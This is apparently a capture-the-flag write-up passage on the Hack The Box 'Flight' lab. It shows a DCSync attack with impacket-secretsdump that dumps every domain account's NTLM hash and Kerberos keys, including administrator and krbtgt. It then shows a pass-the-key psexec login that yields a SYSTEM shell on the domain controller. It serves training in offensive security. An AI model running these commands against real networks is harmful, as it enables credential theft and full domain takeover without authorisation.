Flight_Privilege_Escalation

DCSync

---

The machine account of the target system has been compromised through the TGT Delegation technique with the tgt of the g0$ account at disposal, i can conduct the dcsync attack to fully compromise the target domain

┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ KRB5CCNAME=g0\$@g0.flight.htb.ccache impacket-secretsdump 'flight.htb/g0$@g0.flight.htb' -k -no-pass -dc-ip $IP -target-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
 
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] dumping domain credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
administrator:500:aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6a2b6ce4d7121e112aeacbc6bd499a7f:::
s.moon:1602:aad3b435b51404eeaad3b435b51404ee:f36b6972be65bc4eaa6983b5e9f1728f:::
r.cold:1603:aad3b435b51404eeaad3b435b51404ee:5607f6eafc91b3506c622f70e7a77ce0:::
g.lors:1604:aad3b435b51404eeaad3b435b51404ee:affa4975fc1019229a90067f1ff4af8d:::
l.kein:1605:aad3b435b51404eeaad3b435b51404ee:4345fc90cb60ef29363a5f38e24413d5:::
m.gold:1606:aad3b435b51404eeaad3b435b51404ee:78566aef5cd5d63acafdf7fed7a931ff:::
c.bum:1607:aad3b435b51404eeaad3b435b51404ee:bc0359f62da42f8023fdde0949f4a359:::
w.walker:1608:aad3b435b51404eeaad3b435b51404ee:ec52dceaec5a847af98c1f9de3e9b716:::
i.francis:1609:aad3b435b51404eeaad3b435b51404ee:4344da689ee61b6fbbcdfa9303d324bc:::
d.truff:1610:aad3b435b51404eeaad3b435b51404ee:b89f7c98ece6ca250a59a9f4c1533d44:::
v.stevens:1611:aad3b435b51404eeaad3b435b51404ee:2a4836e3331ed290bd1c2fd2b50beb41:::
svc_apache:1612:aad3b435b51404eeaad3b435b51404ee:f36b6972be65bc4eaa6983b5e9f1728f:::
o.possum:1613:aad3b435b51404eeaad3b435b51404ee:68ec50916875888f44caff424cd3f8ac:::
g0$:1001:aad3b435b51404eeaad3b435b51404ee:140547f31f4dbb4599dc90ea84c27e6b:::
[*] Kerberos keys grabbed
administrator:aes256-cts-hmac-sha1-96:08c3eb806e4a83cdc660a54970bf3f3043256638aea2b62c317feffb75d89322
administrator:aes128-cts-hmac-sha1-96:735ebdcaa24aad6bf0dc154fcdcb9465
administrator:des-cbc-md5:c7754cb5498c2a2f
krbtgt:aes256-cts-hmac-sha1-96:fb234268e90162081d11b7e9d5097091be02f42c25eec0d4bbf8a2442e9d40d0
krbtgt:aes128-cts-hmac-sha1-96:19d9549f8e011231c9a755e0b7d7695f
krbtgt:des-cbc-md5:9bf8155161a8e09e
s.moon:aes256-cts-hmac-sha1-96:48de57e200e25b1c3af677e7b51eee7c56aa414b9420578f0589cbb511289505
s.moon:aes128-cts-hmac-sha1-96:f7caecaae1d9b440b9967018e3e51b9d
s.moon:des-cbc-md5:2ab6a4c4c273d67a
r.cold:aes256-cts-hmac-sha1-96:296926d640823978cfd8dea60b749e853a37f761446af0b395b631098a90140b
r.cold:aes128-cts-hmac-sha1-96:309cb9b5651626b3a46b61d329a1cf6a
r.cold:des-cbc-md5:91b91079a80dd9c1
g.lors:aes256-cts-hmac-sha1-96:bfaf4779007a83d75a380271bce1604f68d76559456598a0411f0806492ff41e
g.lors:aes128-cts-hmac-sha1-96:2691b47070c034f62ece4666dedf634d
g.lors:des-cbc-md5:a8dffd9bd9768ad9
l.kein:aes256-cts-hmac-sha1-96:c6e0c7ccb7dda382cb67568c46790fa76197a064d116f9c3174c371f9fd55b16
l.kein:aes128-cts-hmac-sha1-96:de4fc76e315dd8575b53762ca0f02567
l.kein:des-cbc-md5:9e34f7dc58a843b9
m.gold:aes256-cts-hmac-sha1-96:c78fcdf6d24c4dc97c8529f4e553c8a40ce09f2bf7070015dadec0d6a0a2c2e9
m.gold:aes128-cts-hmac-sha1-96:8e493fabfc5934d170803d9f72edba63
m.gold:des-cbc-md5:c10ee3d32f404015
c.bum:aes256-cts-hmac-sha1-96:13979a025f384f0a4bee1f2a9ce070153415401cac19a955aa4a481aaf756917
c.bum:aes128-cts-hmac-sha1-96:4b55f9b30586369b51895978d156a487
c.bum:des-cbc-md5:efea1abca840ba9b
w.walker:aes256-cts-hmac-sha1-96:8550cc8578c70eac932e6ab1de4bbd1e89cf29c4e085d65e0b08fc612a6020c1
w.walker:aes128-cts-hmac-sha1-96:c071b18454a6624ddde12c9ddf6d8d08
w.walker:des-cbc-md5:efa25eeac237b5fe
i.francis:aes256-cts-hmac-sha1-96:832a16b70c274b3304d1a7acad1436dd882da176328bd201720273661989dd30
i.francis:aes128-cts-hmac-sha1-96:24de7c367fee08862eab61bca6c94ecd
i.francis:des-cbc-md5:57aebf1af41ff768
d.truff:aes256-cts-hmac-sha1-96:e3a0f167df5320065d33035d2dd9c8fc11d11d6444073b5f826b5a9dd7fb33ff
d.truff:aes128-cts-hmac-sha1-96:972d4bd171f9ff3a09e1f7463fe32114
d.truff:des-cbc-md5:febc6b491c197326
v.stevens:aes256-cts-hmac-sha1-96:f6ef7602f72072c7d8d52fa5b2bc479ab20e6f9a69e190a9681901c46583a078
v.stevens:aes128-cts-hmac-sha1-96:466605520d9643b9ea77016aa1d2d530
v.stevens:des-cbc-md5:a8e54fb90154fdce
svc_apache:aes256-cts-hmac-sha1-96:582dc5b5e2db775a9dee7b4ebc55f58811548a0682ac4bceb21de579385be9c3
svc_apache:aes128-cts-hmac-sha1-96:9bc038f14a0a0ff99f90ee88eaa8e92f
svc_apache:des-cbc-md5:feb09ece8f3d453e
o.possum:aes256-cts-hmac-sha1-96:042649ac9128597203cc88d0130af2708c1c77004c57b1c9979bb8c6af75b502
o.possum:aes128-cts-hmac-sha1-96:fcb7ed22eb484c773969089fe39d9d40
o.possum:des-cbc-md5:cdd0972cec1f2625
g0$:aes256-cts-hmac-sha1-96:11ad9a25157bdc6e7fd9df6c0872c33d790f7660c6f5e6ea526996b808e4d7bb
g0$:aes128-cts-hmac-sha1-96:fa0d7c35e273ae2121d1e3c54b19c3cf
g0$:des-cbc-md5:463d9edadc20e308
[*] Cleaning up... 

Domain Level Compromise

Shell Drop

---

┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ impacket-psexec 'flight.htb/administrator@g0.flight.htb' -aesKey 08c3eb806e4a83cdc660a54970bf3f3043256638aea2b62c317feffb75d89322 -k -no-pass -dc-ip $IP 
Impacket v0.11.0 - Copyright 2023 Fortra
 
[-] CCache file is not found. Skipping...
[*] Requesting shares on g0.flight.htb.....
[*] Found writable share ADMIN$
[*] Uploading file WDYjZVkR.exe
[*] Opening SVCManager on g0.flight.htb.....
[*] Creating service QUJM on g0.flight.htb.....
[*] Starting service QUJM.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32> whoami
nt authority\system
 
C:\Windows\system32> hostname
g0
 
C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::23d
   IPv6 Address. . . . . . . . . . . : dead:beef::b1d9:efc7:61e1:4d02
   Link-local IPv6 Address . . . . . : fe80::b1d9:efc7:61e1:4d02%6
   IPv4 Address. . . . . . . . . . . : 10.10.11.187
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%6
                                       10.10.10.2

System Level Compromise